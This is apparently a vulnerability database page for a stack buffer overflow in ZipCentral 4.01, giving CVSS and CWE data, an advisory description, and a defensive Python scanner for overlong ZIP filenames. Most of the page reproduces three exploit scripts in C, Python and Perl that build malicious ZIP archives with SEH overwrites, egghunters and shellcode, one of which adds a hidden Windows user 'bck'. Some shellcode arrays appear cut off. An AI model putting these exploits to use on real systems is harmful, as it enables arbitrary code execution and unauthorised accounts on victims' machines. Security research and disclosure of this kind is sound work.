Published: 2006-06-01 06:02:00
Last revised: 2011-07-28 00:00:00

[Original] Stack-based buffer overflow in ZipCentral 4.01 allows remote user-assisted attackers to execute arbitrary code via a ZIP archive containing a long filename.

[CNNVD] ZipCentral ZIP file extraction stack overflow vulnerability (CNNVD-200606-017)


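- CVSS (base score)

CVSS score: 7.6 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause the system to go down completely]
Attack complexity: HIGH [specific access conditions are required for exploitation]
Attack vector: NETWORK [the attacker does not need internal network access or local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]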

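- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources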
(UNKNOWN)  XF  zipcentral-zip-filename-bo(26737)
(UNKNOWN)  BID  18160
(UNKNOWN)  BUGTRAQ  20060531 Secunia Research: ZipCentral ZIP File Handling Buffer Overflow Vulnerability

- Vulnerability information

ZipCentral ZIP file extraction stack overflow vulnerability
High risk  Buffer overflow
2006-06-01 00:00:00 2007-09-27 00:00:00

- Advisories and patches


- Vulnerability information (2278)

ZipCentral 4.01 ZIP File Handling Local Buffer Overflow Exploit (EDBID:2278)
windows local
2006-08-30 Verified
0 bratax
ZipCentral 4.01 Exploit by bratax (

Soooooo many thanks to BuzzDee and c0rrupt for helping me with all the
problems I encountered :) Wouldn't have finished this without you guys!

Greetz to everyone I like... (no, that doesn't include you turb00)!


Some technical info:
- vulnerability is available here:
- using SEH to exploit this
- some code might look weird in this source.. (e.g. shellcode, offsets,...)
  this is because a lot of values are changed in memory.. so use your favorite
  debugger to see the real values and codes
- shellcode adds a windows user "bck" with password "bck" (thx metasploit)
- tested on XP Pro English (SP2) and XP Home Dutch (SP2)


#include <stdio.h>
#include <string.h>

unsigned char scode[] =

char head[] = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00"
char middle[] = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00"
char tail[] = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00"

int main(int argc,char *argv[])
	char overflow[657]; // is 657 bytes big enough for a filename?
	char overflow2[1407];
FILE *vuln;
if(argc == 1)
    printf("ZipCentral 4.01 Buffer Overflow Exploit.\n");
    printf("Coded by bratax (\n");
    printf("Usage: %s <outputfile>\n",argv[0]);
    return 0;
vuln = fopen(argv[1],"w");

//build overflow buffer here.
memset(overflow,0x41,sizeof(overflow)); //fill with crap
memcpy(overflow+2, scode, 483); // our shellcode
memcpy(overflow+653, "\x82\x6E\xEC\x98", 4); // jmp back to shellcode
memset(overflow2, 0x42, sizeof(overflow2)); // more crap
memcpy(overflow2+0,"\x98\x85\x8E\x00", 4); // pop pop ret
// pop pop ret somewhere within 0x00xxxxFF.. needed because of 2 reasons
// which I'm not going to explain here right now..
// notice that 008E8598 will be changed in memory and will become 00C4E0FF
// this might be different on other machines, but will always be 00xxE0FF

    //Write file
    fwrite(head, 1, sizeof(head), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(overflow2, 1, sizeof(overflow2), vuln);
    fwrite(middle, 1, sizeof(middle), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(overflow2, 1, sizeof(overflow2), vuln);
    fwrite(tail, 1, sizeof(tail), vuln);
printf("File written.\nOpen with ZipCentral 4.01 to exploit.\n");
return 0;

// [2006-08-30]

- Vulnerability information (12053)

ZipCentral (.zip) SEH Exploit (EDBID:12053)
windows local
2010-04-04 Verified
0 TecR0c
# Title:                ZipCentral (.zip) SEH exploit
# Author:               TecR0c - &
# Download:   
# Platform:             Windows XP sp3 En (VMWARE)
# Greetz to:            Corelan Security Team
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Unfortunately, no one can be told what the Matrix is. You have to see it for yourself!
# To be able to make sure your hex values get mangled correctly I have created my own
# Mangled Chart:
# Description of exploit:
# You can notice I have used this technique for my PPR and JMPs

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                              |"
print "|                                     |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] pill (.zip) SEH exploit - by TecR0c"

ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"

cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"

eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"

#Limit of 50 bytes for the filename

#filename = ("\x50\x41\x53"

filename = (

# ESI - I'm going to enjoy watching you die Mr Anderson

# align ESI for msg - To deny our own impulses is to deny the very thing that makes us human
getpc = ("\x89\x05\x5e\x41\x98\x99\x41\x8a\x94\x98\x98\x98")

# EDI is chosen thanks to the egghunter - Never send a human to do a machines job
msg = ( # TITLE=Corelan TEXT="You have been pwned"

buff = filename
buff += "\x20" * (50-len(buff))
buff += "\x57\x30\x30\x54" # If you close your eyes, it almost feels like you're eating runny eggs
buff += "\x57\x30\x30\x54" # The trace was completed
buff += msg # Don't hate me Trinity... I'm just the messenger
buff += "\x41" * (653-len(buff))
buff += "\x89\x06\x42\x42"
buff += "\x56\x29\xa5\x72" # Welcome to the desert of the real
buff += "\x41" * 10
buff += getpc
buff += egghunter # The digital pimp hard at work
buff += "\x42" * (4064-len(buff))
buff += ".txt"

mefile = open('','w');
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);

- Vulnerability information (14433)

ZipCentral (.zip) Buffer Overflow (SEH) (EDBID:14433)
windows local
2010-07-21 Verified
0 Jiten Pathy
# Author : Jiten Pathy
# July 21 2010

#Thanks to the page for helping me understand zip file format
#Thanks to corelanc0d3r for shedding light on these type of exploits at
# Greetz to SSTeam and G4H members

#There is already an exploit on zipcentral filename handling buffer
#overflow over 2 months ago which uses an address from a system dll for
#SEH which isn't reliable across different platforms so this one uses an
#address from exe file which is a little complicated but reliable

my $filename="";

my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .# file size

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\xe4\x0f". # file size

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00". # Size of central directory (bytes)
"\x02\x10\x00\x00". # Offset of start of central directory,
                    # relative to start of archive

my $egghunter="hffffk4diFkDrj02Drk0D2AuEE2C4s4I8K1L0v7K0R0I0i4A7N0J022q0D5M".
#ascii mixed case egghunter with EDX as basereg

my $junk="A"x(653-length($egghunter)-102);

#Here is a different approach prior to make EDX to point at our
#egghunter.
#push ebp,pop edx puts ebp into edx and then we add edx with right value.
#Here we encode
#add edx,087f
#jmp edx ;with custom decoder (muts) which should eventually execute these
#two instructions which should be produced in stack after the decoder. So
#we need to prepare esp for this. But I found that instruction "pop esp"('\')
#breaks the shellcode (not so lucky for this application).
#So we can't just pop things from top of stack to point esp and we can't use
#too many "popa" or "pop r" here due to limited space.
#So what we do here is inc esp using loop which will make esp point
#somewhere after the decoder. So I did some lulz math found out how much
#increment I need (0xb16) and did 2 loops (in hex 42*2b=b16; both are
#alphanumeric) and we get the desired value in esp. There is always a way to
#make our way through.

my $preparegg="\x6a\x42". #push 42h
"\x58".                    #pop eax
"\x6a\x2b".                #push 2bh
"\x59".                   #pop ecx
"C"x5 .                   #fillers for our loop Here is where inner loop #will jump
"\x44".                   #inc esp
"\x48".                   #dec eax
"\x75\xf6".               #converted \x75\xf7 not much difference lol #which is jnz -9
"\x34\x42".               #xor al,42
"\x49".                   #dec ecx
"\x75\xf6".               #again jnz -9 but this one will jump somewhere in 
#the fillers but all we care is about inc esp getting executed
"\x55".                   #push ebp
"\x5a".                   #pop edx
"\x25\x35\x32\x31\x35".   #zero eax
"\x2d\x54\x56\x54\x36".   #\x08\xff\xe2\x41
"\x25\x35\x32\x31\x35".   #zero eax
"\x2d\x34\x28\x6b\x29".   #\x66\x81\xc2\x7f

my $fill="A"x(102-length($preparegg));#more nops

my $nseh="\x74\xf7\x41\x41";#becomes 74 98 41 41 jumping 102 bytes back

my $seh="\x41\x6c\x42\x00";#ascii compatible ppr address

#alpha mixedcase messagebox shellcode with EDI as basereg (since egghunter
#has already EDI as address of our shellcode)
my $shell="hffffk4diFkDwj02Dwk0D7AuEE4n0b7n1132165L5m403i7l003d8K4G1p5k0l3c".

my $payload=$egghunter.$junk.$preparegg.$fill.$nseh.$seh."w00tw00t".$shell;

my $more="D" x (4064-length($payload));

$payload = $payload.$more.".txt";

print "Size : " . length($payload)."\n";
print "Removing old $filename file\n";
system("del $filename");
print "Creating new $filename file\n";
open(FILE, ">$filename");
print FILE $ldf_header.$payload.$cdf_header.$payload.$eofcdf_header;
print "\m/ Your exploit is ready.\n";
#That popped a messagebox with message "My First Null free Shellcode In Windows"(indeed it was).All you need is a bit of quick math and keep looking for possibilities.
#Hope someone learned something from this re-exploit.		

- Vulnerability information

ZipCentral ZIP File Archive Filename Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Third-party Verified

- Vulnerability description

A remote overflow exists in ZipCentral. The product fails to perform boundary checks on filenames in zip archives resulting in a stack-based overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
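A defender-side check for the condition described above, added here as an example (it is not part of the advisory or of any code listed on this page): it scans a file for ZIP local and central-directory headers and reports every header whose declared filename length exceeds a limit. The 255-byte limit and the function names are assumptions, and `build_zip` only constructs sample input.

```python
import struct

LFH_SIG = b"PK\x03\x04"  # local file header signature
CDH_SIG = b"PK\x01\x02"  # central directory header signature
MAX_NAME_LEN = 255       # assumed policy limit, not a value from the advisory

# signature -> (record kind, offset of 16-bit filename length, fixed header size)
LAYOUT = {LFH_SIG: ("local", 26, 30), CDH_SIG: ("central", 28, 46)}


def find_long_names(data: bytes, limit: int = MAX_NAME_LEN):
    """Return sorted (offset, kind, declared_length) for each header whose
    filename-length field exceeds `limit`.

    Headers are located by signature scan instead of following the archive's
    own offsets, because a hostile archive controls those offsets. Signature
    bytes inside compressed data can therefore produce false positives."""
    findings = []
    for sig, (kind, len_off, hdr_size) in LAYOUT.items():
        pos = data.find(sig)
        while pos != -1:
            if pos + hdr_size <= len(data):  # skip truncated headers
                (name_len,) = struct.unpack_from("<H", data, pos + len_off)
                if name_len > limit:
                    findings.append((pos, kind, name_len))
            pos = data.find(sig, pos + 4)
    return sorted(findings)


def build_zip(name: bytes) -> bytes:
    """Constructed sample input: an archive with one empty stored entry."""
    lfh = struct.pack("<4s5H3I2H", LFH_SIG, 20, *[0] * 7, len(name), 0) + name
    cdh = struct.pack("<4s6H3I5H2I", CDH_SIG, 20, 20, *[0] * 7,
                      len(name), *[0] * 6) + name
    eocd = struct.pack("<4s4H2IH", b"PK\x05\x06", 0, 0, 1, 1,
                       len(cdh), len(lfh), 0)
    return lfh + cdh + eocd


if __name__ == "__main__":
    for label, name in (("benign", b"readme.txt"),
                        ("oversized", b"A" * 4064 + b".txt")):
        print(label, find_long_names(build_zip(name)))
```

Run it on files before they reach an archiver; a hit in either header type is enough to quarantine the file, since both copies of the filename are parsed by ZIP tools.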

- Timeline

2006-05-30 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author